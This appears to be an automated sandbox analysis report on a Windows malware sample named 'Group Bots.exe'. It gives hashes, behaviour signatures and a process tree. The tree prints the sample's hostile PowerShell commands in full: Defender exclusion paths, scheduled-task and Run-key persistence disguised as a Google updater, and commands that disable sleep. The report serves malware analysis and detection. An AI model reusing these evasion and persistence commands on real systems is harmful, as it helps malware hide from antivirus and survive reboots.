Analysis

  • max time kernel
    34s
  • max time network
    82s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/08/2023, 14:39

General

  • Target

    Group Bots.exe

  • Size

    1.6MB

  • MD5

    f5a2da741ab2b11ecd79d957f205e4bc

  • SHA1

    62d9022f4b72268fb2523cf849ed9b9b0a162888

  • SHA256

    9824e1ed7f0224fbcc9f3e93bb645500fff8d8841d9adb0da49667cce9537d2a

  • SHA512

    12cb4ee676c720989a70b3babd8973b678e6b27cf55375e4b9d5dc5c6312513ef3b27de11a4802c9f3b6d41bb52f2fffe0ba87a2bfd4fe9a23185b40596e2c68

  • SSDEEP

    49152:KNm+gSx2NFNJL2enS7U6LGsGjbkhBuvS5XMjViyHR:KNmQgNF7SpL3Gjbk/MW8jViu

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3160
      • C:\Users\Admin\AppData\Local\Temp\Group Bots.exe
        "C:\Users\Admin\AppData\Local\Temp\Group Bots.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1712
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1348
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hizrhk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1832
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4748
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2808
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:928
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:740
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:372
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jxtsdguy#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2340
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:2160
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
            PID:3624
        • C:\Program Files\Google\Chrome\updater.exe
          "C:\Program Files\Google\Chrome\updater.exe"
          1⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:3720

        Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe

          Filesize

          1.6MB

          MD5

          f5a2da741ab2b11ecd79d957f205e4bc

          SHA1

          62d9022f4b72268fb2523cf849ed9b9b0a162888

          SHA256

          9824e1ed7f0224fbcc9f3e93bb645500fff8d8841d9adb0da49667cce9537d2a

          SHA512

          12cb4ee676c720989a70b3babd8973b678e6b27cf55375e4b9d5dc5c6312513ef3b27de11a4802c9f3b6d41bb52f2fffe0ba87a2bfd4fe9a23185b40596e2c68

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          62623d22bd9e037191765d5083ce16a3

          SHA1

          4a07da6872672f715a4780513d95ed8ddeefd259

          SHA256

          95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

          SHA512

          9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          cf3a85f097fa08c49bf10783f874a5c0

          SHA1

          c35c3a27c0f82691f87af2892295c7368ee3173f

          SHA256

          0caf1c4655b20f22fba39cadc077a5160eb4dc3638e06a98c0abfb6f87369790

          SHA512

          557d2a7761b4b1a7293fbd2e9f8ff5c71e5ba053c2d4dc79c9dc2de7d4896a7ddc293ef282dacd23deae53a4b64e54d3f3236144c8765b0fc109965d2798244a

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dznisiog.lxt.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/1348-10-0x0000025237570000-0x0000025237592000-memory.dmp

          Filesize

          136KB

        • memory/1348-11-0x00007FF805930000-0x00007FF8063F1000-memory.dmp

          Filesize

          10.8MB

        • memory/1348-12-0x000002524F9A0000-0x000002524F9B0000-memory.dmp

          Filesize

          64KB

        • memory/1348-13-0x000002524F9A0000-0x000002524F9B0000-memory.dmp

          Filesize

          64KB

        • memory/1348-16-0x00007FF805930000-0x00007FF8063F1000-memory.dmp

          Filesize

          10.8MB

        • memory/1712-0-0x00007FF706B90000-0x00007FF706D37000-memory.dmp

          Filesize

          1.7MB

        • memory/1712-36-0x00007FF706B90000-0x00007FF706D37000-memory.dmp

          Filesize

          1.7MB

        • memory/1832-31-0x0000017D39FA0000-0x0000017D39FB0000-memory.dmp

          Filesize

          64KB

        • memory/1832-32-0x0000017D39FA0000-0x0000017D39FB0000-memory.dmp

          Filesize

          64KB

        • memory/1832-34-0x00007FF805930000-0x00007FF8063F1000-memory.dmp

          Filesize

          10.8MB

        • memory/1832-20-0x0000017D39FA0000-0x0000017D39FB0000-memory.dmp

          Filesize

          64KB

        • memory/1832-19-0x0000017D39FA0000-0x0000017D39FB0000-memory.dmp

          Filesize

          64KB

        • memory/1832-18-0x00007FF805930000-0x00007FF8063F1000-memory.dmp

          Filesize

          10.8MB

        • memory/2340-37-0x00007FF805930000-0x00007FF8063F1000-memory.dmp

          Filesize

          10.8MB

        • memory/2340-47-0x0000018F7B190000-0x0000018F7B1A0000-memory.dmp

          Filesize

          64KB

        • memory/2340-48-0x0000018F7B190000-0x0000018F7B1A0000-memory.dmp

          Filesize

          64KB

        • memory/2340-50-0x0000018F7B190000-0x0000018F7B1A0000-memory.dmp

          Filesize

          64KB

        • memory/2340-53-0x00007FF805930000-0x00007FF8063F1000-memory.dmp

          Filesize

          10.8MB

        • memory/3720-54-0x00007FF641770000-0x00007FF641917000-memory.dmp

          Filesize

          1.7MB